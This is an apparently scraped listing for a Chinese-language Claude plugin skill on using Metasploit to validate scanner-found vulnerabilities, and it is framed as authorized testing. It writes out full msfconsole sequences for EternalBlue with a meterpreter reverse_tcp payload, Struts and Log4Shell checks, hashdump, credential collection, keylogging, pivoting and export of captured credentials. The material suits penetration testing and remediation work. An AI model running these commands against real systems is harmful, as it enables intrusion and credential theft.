Verifies vulnerabilities using Metasploit Framework exploits like EternalBlue and Log4Shell, auxiliary scanners, and post-exploitation modules to prioritize remediation in vulnerability management.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
Metasploit Framework 是全球最广泛使用的渗透测试平台,由 Rapid7 维护,包含超过 2300 个漏洞利用模块、1200 个辅助模块和 400 个后渗透模块。在漏洞管理场景中,Metasploit 作为验证工具,用于确认已发现的漏洞是否真实可利用,从而实现基于风险的优先级排序,并向利益相关方展示实际影响。
Guides Metasploit workflows to validate scanner-found vulnerabilities, demonstrate risk, and verify patches in authorized pentesting.
Guides exploitation of vulnerabilities using Metasploit Framework for validating scanner findings, demonstrating risk, and prioritizing remediation in authorized pentesting.
Guides authorized Metasploit Framework use for penetration testing, exploit development, vulnerability validation, and post-exploitation workflows in controlled environments.
Share bugs, ideas, or general feedback.
Metasploit Framework 是全球最广泛使用的渗透测试平台,由 Rapid7 维护,包含超过 2300 个漏洞利用模块、1200 个辅助模块和 400 个后渗透模块。在漏洞管理场景中,Metasploit 作为验证工具,用于确认已发现的漏洞是否真实可利用,从而实现基于风险的优先级排序,并向利益相关方展示实际影响。
与进攻性红队演练不同,漏洞管理使用 Metasploit 用于:
# 启动 PostgreSQL 并初始化数据库
sudo systemctl start postgresql
sudo msfdb init
# 启动 msfconsole
msfconsole -q
# 验证数据库连接
msf6> db_status
msf6> workspace -a vuln_validation_2025
# 导入漏洞扫描结果
msf6> db_import /path/to/nessus_scan.nessus
msf6> hosts
msf6> vulns
# 示例:从扫描发现中验证 MS17-010(EternalBlue)
msf6> search type:exploit name:ms17_010
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> show options
msf6> set RHOSTS 192.168.1.100
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 192.168.1.50
msf6> set LPORT 4444
# 先使用 check 命令(非利用性验证)
msf6> check
# [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!
# 仅在 check 确认漏洞存在且已获授权的情况下才进行利用
msf6> exploit
# 示例:验证 Apache Struts RCE(CVE-2017-5638)
msf6> use exploit/multi/http/struts2_content_type_ognl
msf6> set RHOSTS target.example.com
msf6> set RPORT 8080
msf6> set TARGETURI /showcase.action
msf6> check
# 示例:验证 Log4Shell(CVE-2021-44228)
msf6> use exploit/multi/http/log4shell_header_injection
msf6> set RHOSTS target.example.com
msf6> set HTTP_HEADER X-Api-Version
msf6> check
# SMB 漏洞扫描
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.1.0/24
msf6> set THREADS 10
msf6> run
# SSL/TLS 漏洞检查
msf6> use auxiliary/scanner/ssl/openssl_heartbleed
msf6> set RHOSTS target.example.com
msf6> run
# HTTP 漏洞验证
msf6> use auxiliary/scanner/http/dir_listing
msf6> set RHOSTS target.example.com
msf6> run
# 数据库认证测试
msf6> use auxiliary/scanner/mssql/mssql_login
msf6> set RHOSTS db-server.corp.local
msf6> set USERNAME sa
msf6> set PASSWORD ""
msf6> run
# 成功利用后,展示影响
meterpreter> getuid
meterpreter> sysinfo
meterpreter> hashdump
meterpreter> run post/multi/gather/env
meterpreter> run post/windows/gather/enum_patches
meterpreter> run post/windows/gather/credentials/credential_collector
# 网络横向移动演示
meterpreter> run post/multi/manage/autoroute
meterpreter> run auxiliary/server/socks_proxy
# 截图作为证据
meterpreter> screenshot
meterpreter> keyscan_start
# 导出利用证据
msf6> vulns -o /tmp/validated_vulns.csv
msf6> hosts -o /tmp/compromised_hosts.csv
msf6> creds -o /tmp/captured_creds.csv
msf6> loot -o /tmp/captured_loot.csv
# 从数据库生成报告
msf6> db_export -f xml /tmp/msf_report.xml
# 修复后,验证漏洞利用不再有效
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.1.100
msf6> check
# [-] 192.168.1.100:445 - Host does NOT appear vulnerable.
# 补丁验证成功
check 命令,在可用时先于 exploit 执行